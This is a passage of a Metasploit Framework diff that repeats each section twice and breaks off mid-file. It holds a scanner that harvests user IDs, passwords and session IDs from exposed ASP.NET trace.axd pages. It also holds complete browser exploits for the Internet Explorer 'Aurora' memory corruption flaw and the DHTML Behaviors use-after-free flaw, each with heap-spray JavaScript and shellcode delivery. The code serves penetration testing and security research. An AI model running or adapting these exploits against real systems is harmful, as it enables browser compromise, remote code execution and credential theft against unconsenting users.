||||
}, 10)
|
||||
|
||||
if res
|
||||
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
||||
]
|
||||
print_status ("DETAIL: #{turl}")
|
||||
reg_info.each do |reg|
|
||||
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
||||
str = result.to_s.chomp
|
||||
|
||||
|
||||
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
||||
print_status ("Physical Path: #{str}")
|
||||
elsif reg.to_s.include?"UserId"
|
||||
print_status ("User ID: #{str}")
|
||||
elsif reg.to_s.include?"Password"
|
||||
print_status ("Password: #{str}")
|
||||
elsif reg.to_s.include?"AspFilterSessionId"
|
||||
print_status ("Session ID: #{str}")
|
||||
elsif reg.to_s.include?"LOCAL_ADDR"
|
||||
print_status ("Local Address: #{str}")
|
||||
elsif result.include?"Via"
|
||||
print_status ("VIA: #{str}")
|
||||
elsif reg.to_s.include?"ALL_RAW"
|
||||
print_status ("Headers: #{str}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanDir
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'HTTP trace.axd Content Scanner',
|
||||
'Version' => '$Revision: 7605 $',
|
||||
'Description' => 'Detect trace.axd files and analize its content',
|
||||
'Author' => ['c4an'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
||||
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
begin
|
||||
turl = tpath+'trace.axd'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
|
||||
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
||||
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => 'TRACE_AXD',
|
||||
:data => "trace.axd"
|
||||
)
|
||||
|
||||
if datastore['TRACE_DETAILS']
|
||||
|
||||
aregex = /Trace.axd\?id=\d/
|
||||
result = res.body.scan(aregex).uniq
|
||||
|
||||
result.each do |u|
|
||||
turl = tpath+u.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
if res
|
||||
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
||||
]
|
||||
print_status ("DETAIL: #{turl}")
|
||||
reg_info.each do |reg|
|
||||
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
||||
str = result.to_s.chomp
|
||||
|
||||
|
||||
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
||||
print_status ("Physical Path: #{str}")
|
||||
elsif reg.to_s.include?"UserId"
|
||||
print_status ("User ID: #{str}")
|
||||
elsif reg.to_s.include?"Password"
|
||||
print_status ("Password: #{str}")
|
||||
elsif reg.to_s.include?"AspFilterSessionId"
|
||||
print_status ("Session ID: #{str}")
|
||||
elsif reg.to_s.include?"LOCAL_ADDR"
|
||||
print_status ("Local Address: #{str}")
|
||||
elsif result.include?"Via"
|
||||
print_status ("VIA: #{str}")
|
||||
elsif reg.to_s.include?"ALL_RAW"
|
||||
print_status ("Headers: #{str}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,161 +1,161 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Internet Explorer. This
|
||||
flaw was found in the wild and was a key component of the "Operation Aurora"
|
||||
attacks that lead to the compromise of a number of high profile companies. The
|
||||
exploit code is a direct port of the public sample published to the Wepawet
|
||||
malware analysis site. The technique used by this module is currently identical
|
||||
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown',
|
||||
'hdm' # Metasploit port
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Internet Explorer. This
|
||||
flaw was found in the wild and was a key component of the "Operation Aurora"
|
||||
attacks that lead to the compromise of a number of high profile companies. The
|
||||
exploit code is a direct port of the public sample published to the Wepawet
|
||||
malware analysis site. The technique used by this module is currently identical
|
||||
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
['MSB', 'MS10-002'],
|
||||
['CVE', '2010-0249'],
|
||||
['OSVDB', '61697'],
|
||||
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
|
||||
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
|
||||
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/\.gif/i))
|
||||
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
|
||||
send_response(cli, data, { 'Content-Type' => 'image/gif' })
|
||||
return
|
||||
end
|
||||
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_element = rand_text_alpha(rand(100) + 1)
|
||||
var_event = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded_arg = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_el_array = rand_text_alpha(rand(100) + 1)
|
||||
bleh = rand_text_alpha(3);
|
||||
var_grab_mem = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_span_id = rand_text_alpha(rand(100) + 1)
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
rand_html = rand_text_english(rand(400) + 500)
|
||||
|
||||
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var #{var_element} = "COMMENT";
|
||||
var #{var_el_array} = new Array();
|
||||
for (i = 0; i < 1300; i++)
|
||||
{
|
||||
#{var_el_array}[i] = document.createElement(#{var_element});
|
||||
#{var_el_array}[i].data = "#{bleh}";
|
||||
}
|
||||
var #{var_event} = null;
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
function #{var_boom}()
|
||||
{
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
}
|
||||
function #{var_loaded}(#{var_loaded_arg})
|
||||
{
|
||||
#{var_boom}();
|
||||
#{var_event} = document.createEventObject(#{var_loaded_arg});
|
||||
document.getElementById("#{var_span_id}").innerHTML = "";
|
||||
window.setInterval(#{var_grab_mem}, 50);
|
||||
}
|
||||
function #{var_grab_mem}()
|
||||
{
|
||||
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
|
||||
for (i = 0; i < #{var_el_array}.length; i++)
|
||||
{
|
||||
#{var_el_array}[i].data = p;
|
||||
}
|
||||
var t = #{var_event}.srcElement;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
|
||||
</body>
|
||||
</html>|
|
||||
|
||||
print_status("Sending #{self.name} to client #{cli.peerhost}")
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
'unknown',
|
||||
'hdm' # Metasploit port
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['MSB', 'MS10-002'],
|
||||
['CVE', '2010-0249'],
|
||||
['OSVDB', '61697'],
|
||||
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
|
||||
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
|
||||
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/\.gif/i))
|
||||
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
|
||||
send_response(cli, data, { 'Content-Type' => 'image/gif' })
|
||||
return
|
||||
end
|
||||
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_element = rand_text_alpha(rand(100) + 1)
|
||||
var_event = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded_arg = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_el_array = rand_text_alpha(rand(100) + 1)
|
||||
bleh = rand_text_alpha(3);
|
||||
var_grab_mem = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_span_id = rand_text_alpha(rand(100) + 1)
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
rand_html = rand_text_english(rand(400) + 500)
|
||||
|
||||
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var #{var_element} = "COMMENT";
|
||||
var #{var_el_array} = new Array();
|
||||
for (i = 0; i < 1300; i++)
|
||||
{
|
||||
#{var_el_array}[i] = document.createElement(#{var_element});
|
||||
#{var_el_array}[i].data = "#{bleh}";
|
||||
}
|
||||
var #{var_event} = null;
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
function #{var_boom}()
|
||||
{
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
}
|
||||
function #{var_loaded}(#{var_loaded_arg})
|
||||
{
|
||||
#{var_boom}();
|
||||
#{var_event} = document.createEventObject(#{var_loaded_arg});
|
||||
document.getElementById("#{var_span_id}").innerHTML = "";
|
||||
window.setInterval(#{var_grab_mem}, 50);
|
||||
}
|
||||
function #{var_grab_mem}()
|
||||
{
|
||||
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
|
||||
for (i = 0; i < #{var_el_array}.length; i++)
|
||||
{
|
||||
#{var_el_array}[i].data = p;
|
||||
}
|
||||
var t = #{var_event}.srcElement;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
|
||||
</body>
|
||||
</html>|
|
||||
|
||||
print_status("Sending #{self.name} to client #{cli.peerhost}")
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -1,252 +1,252 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# originally ie_iepeers_pointer.rb
|
||||
#
|
||||
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
|
||||
#
|
||||
# Tested successfully on the following platforms:
|
||||
# - Microsoft Internet Explorer 7, Windows Vista SP2
|
||||
# - Microsoft Internet Explorer 7, Windows XP SP3
|
||||
# - Microsoft Internet Explorer 6, Windows XP SP3
|
||||
#
|
||||
# Exploit found in-the-wild. For additional details:
|
||||
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability within the DHTML behaviors
|
||||
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
|
||||
discovered being used in-the-wild and was previously known as the "iepeers"
|
||||
vulnerability. The name comes from Microsoft's suggested workaround to block
|
||||
access to the iepeers.dll file.
|
||||
|
||||
According to Nico Waisman, "The bug itself is when trying to persist an object
|
||||
using the setAttribute, which end up calling VariantChangeTypeEx with both the
|
||||
source and the destination being the same variant. So if you send as a variant
|
||||
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
|
||||
using it. This will end up on a call to PlainRelease which deref the reference
|
||||
and clean the object."
|
||||
|
||||
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # original discovery
|
||||
'Trancer <mtrancer[at]gmail.com>', # metasploit module
|
||||
'Nanika', # HIT2010 IE7 reliable PoC
|
||||
'jduck' # minor cleanups
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0806' ],
|
||||
[ 'OSVDB', '62810' ],
|
||||
[ 'BID', '38615' ],
|
||||
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
|
||||
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
|
||||
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
|
||||
[ 'MSB', 'MS10-018' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
|
||||
{
|
||||
'Method' => 'automatic'
|
||||
}
|
||||
],
|
||||
|
||||
[ 'IE 6 SP0-SP2 (onclick)',
|
||||
{
|
||||
'Method' => 'onclick',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
|
||||
# "A great celebration of HIT2010" - http://www.hitcon.org/
|
||||
[ 'IE 7.0 (marquee)',
|
||||
{
|
||||
'Method' => 'marquee',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def auto_target(cli, request)
|
||||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2] # IE7 on XP and 2003
|
||||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if (not mytarget)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
|
||||
|
||||
# Randomize the javascript variable names
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_array = rand_text_alpha(rand(100) + 1)
|
||||
j_function1 = rand_text_alpha(rand(100) + 1)
|
||||
j_function2 = rand_text_alpha(rand(100) + 1)
|
||||
j_object = rand_text_alpha(rand(100) + 1)
|
||||
j_id = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Construct the final page
|
||||
case mytarget['Method']
|
||||
|
||||
when 'onclick'
|
||||
html = %Q|<html><body>
|
||||
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
|
||||
<script language='javascript'>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}(){
|
||||
#{j_function1}();
|
||||
var #{j_object} = document.createElement('body');
|
||||
#{j_object}.addBehavior('#default#userData');
|
||||
document.appendChild(#{j_object});
|
||||
try {
|
||||
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
|
||||
#{j_object}.setAttribute('s',window);
|
||||
}
|
||||
} catch(e){ }
|
||||
window.status+='';
|
||||
}
|
||||
|
||||
document.getElementById('#{j_id}').onclick();
|
||||
</script></body></html>
|
||||
|
|
||||
|
||||
when 'marquee'
|
||||
j_attrib = rand_text_alpha(6);
|
||||
html = %Q|<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
.#{j_object} {behavior: url(#default#userData);}
|
||||
</style>
|
||||
</head>
|
||||
<script>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}() {
|
||||
#{j_function1}();
|
||||
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.location);
|
||||
}
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
|
||||
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
|
||||
}
|
||||
</script>
|
||||
<body onload="#{j_function2}();"></body>
|
||||
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
|
||||
</html>
|
||||
|
|
||||
|
||||
end
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# originally ie_iepeers_pointer.rb
|
||||
#
|
||||
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
|
||||
#
|
||||
# Tested successfully on the following platforms:
|
||||
# - Microsoft Internet Explorer 7, Windows Vista SP2
|
||||
# - Microsoft Internet Explorer 7, Windows XP SP3
|
||||
# - Microsoft Internet Explorer 6, Windows XP SP3
|
||||
#
|
||||
# Exploit found in-the-wild. For additional details:
|
||||
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability within the DHTML behaviors
|
||||
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
|
||||
